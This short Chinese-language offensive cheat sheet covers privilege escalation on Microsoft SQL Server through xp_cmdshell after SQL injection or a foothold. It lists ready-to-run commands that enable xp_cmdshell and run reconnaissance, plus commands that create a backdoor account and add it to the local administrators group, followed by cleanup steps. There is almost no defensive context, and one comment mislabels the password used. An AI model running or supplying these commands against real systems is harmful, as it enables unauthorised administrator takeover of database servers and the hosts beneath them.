0x01 前提
-
getshell或者存在sql注入並且能夠執行命令。
-
sql server是system權限,sql server默認就是system權限。
0x02 xp_cmdshell
有了xp_cmdshell的話可以執行系統命令,該組件默認是關閉的,因此需要把它打開。
開啟xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;
關閉xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure
0x03 提權
exec master..xp_cmdshell 'net user test pinohd123. /add' 添加用戶test,密碼test exec master..xp_cmdshell 'net localgroup administrators test add' 添加test用戶到管理員組
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
sp_configure 'show advanced options',1;
reconfigure;
go
sp_configure 'xp_cmdshell',1
reconfigure
go
exec master..xp_cmdshell "systeminfo"
exec master..xp_cmdshell "tasklist"
exec master..xp_cmdshell "NET USER"
exec master..xp_cmdshell "whoami"
exec master..xp_cmdshell 'net user masa pinohd123. /add'
exec master..xp_cmdshell 'net localgroup administrators masa /add'
exec master..xp_cmdshell 'net user masa /delete'
exec master..xp_cmdshell 'net localgroup administrators masa /delete'
sp_configure 'xp_cmdshell',0
reconfigure
go